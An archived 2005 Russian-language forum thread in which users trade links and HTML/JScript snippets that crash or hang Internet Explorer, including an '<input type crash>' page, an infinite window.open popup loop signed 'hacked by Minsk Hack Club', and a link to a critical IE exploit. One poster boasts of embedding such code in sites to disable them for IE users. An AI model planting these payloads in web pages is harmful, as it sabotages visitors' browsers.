Просмотр полной версии : Ослик умер =((((
SladerNon
30.05.2005, 07:33
http://crapware.lx.ro/junkcode/security/ie-sp1-file-a0-crash.htm
Идем по ссылке, тыкаем на
Click Me - The Link Of Death!
И ваш IE успешно отбрасывает коньки!
P.S. вирусов нет.
JazzzSummerMan
30.05.2005, 08:14
Хм, не совсем понятно.
Ты сам пробовал?)
Там нет по ссылке скрипта, а только "file://*:/"
если IE и зависает при обработке такого пути(в чем сильно сомневаюсь), то не все версии и не во всех виндах. Да и нафиг это нужно, можно написать скрипт который окна генерирует, результат тот же. Другое дело - видел скрипт который вызывает синий экран, вешает ОС или отрубает от сети - вот это уже серьезнее)
SladerNon
30.05.2005, 08:27
Гыг =).
Работает =).
(Тестированно на WInXP SP2 со всеми майскими заплатками 2005 г. И на последней(на сегодняшний день версии IE).
6.0.2900.2180.xpsp2)
Посмотри на HTML код странички =)
Минимум, и со вкусом =).
Учитывая массовое использование ослика, вставляем код в нужный ресурс, и он становится недоступным, для поклонников IE =).
Ловкость рук и никакого мошеничества =)
Другое дело - видел скрипт который вызывает синий экран, вешает ОС или отрубает от сети - вот это уже серьезнее)
Я не только видел подобные творения, но и применял на практике =). Там часто срабатывает механизм:
Не везде, не при таких настройках и не всегда =)
Тока не думаю надо такие вещи сюда выкладывать =). Чебурашки Забанят =))))))
SladerNon
30.05.2005, 10:30
Просьба отписаться, если повис у Вас ваш Internet Explorer =)
Какая версия и на какой системе протестировали =).
Отписаться желательно даже тогда, когда не повис =).
Заранее благодарен.
SladerNon
30.05.2005, 10:52
Еще немного о браузерах =)
http://www.securityfocus.com/archive/1/319488/2003-04-22/2003-04-28/0
(описание).
Создайте файл и поместите туда код:
<html>
<form>
<input type crash>
</form>
</html>
=)
У меня Xp без сервис паков безовсяких обновлений и Ослик просто 6"вечно глючный"
Вполне спокойно открыл )
Хотя что насчёт ссылок то я их много видел и делал сам, от них не только Ie зависал))
SladerNon
30.05.2005, 11:06
У меня Xp без сервис паков безовсяких обновлений и Ослик просто 6"вечно глючный"
Как не аккуратно то по инету бегаешь =). айяйяй =))))
JazzzSummerMan
30.05.2005, 12:14
вот пример посерьезнее) на секлабе уязвимости присвоили статус "критическая")
на ссылку ни в коем случае не кликать
hттp://www.securitylab.ru/_Exploits/2004/12/ie/aniblue.htm
Windows 2003 SP4 IE 6.0.2800.1106 SP1 + 5 пакетов заплаток разных!
Все работает, НО опасности практически нет, единственное то, что это если у человека было допустим много заходов куда нибудь, а тут зашел и ему выскакивает ошибка о неверно выполненой задаче и окно закрываеться! Тоесть уге кнопочку "назад" не нажать и искать пагу заного надо, если не знаешь полного пути к ней! Вот и все! А вобще интересно давольно таки!
по поводу Click Me - The Link Of Death! у меня здох и ие 6.0 при ос хп сп2, а также netscape 0.9.6.b
2SladerNon
что за майские заплатки ?
мой Firefox 1.0.4 после ссылки выжил!)
можно написать скрипт который окна генерирует,
Вот ссылочка www.dimanastr.chat.ru --- окна генерирует НЕ НАЖИМАЙТЕ!
Хех.. я нажал.. проверил свой бразуер.. ну ничё таки.. =)
Жив остался)).
зы: блокировка окошек и попапов рулит)).
Вот ссылочка www.dimanastr.chat.ru (http://www.dimanastr.chat.ru/) --- окна генерирует НЕ НАЖИМАЙТЕ!
<SCRIPT LANGUAGE=JScript>
{
window.alert("hacked by Minsk Hack Club");
while(1)window.open("http://wwp.icq.com/scripts/search.dll?to=someUIN");
}
</SCRIPT>
<!-- ><!-- "><!-- '><!-- -->
</textarea></form></title></comment></a></div></span></ilayer></layer>
</iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<script language="JavaScript" src="<A href="http://www-banner.chat.ru/allshops.js"></script">http://www-banner.chat.ru/allshops.js"></script>
A B HTML CODe Ничерта умного и нового!
П.С. А че за минский хак клуб, кто нить слышал?! :)
Я слыхал про него.
И даже что то видел их сайт чтоли.
DRON-ANARCHY
04.06.2005, 21:33
Минские хакеры крутые кодеры!=)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot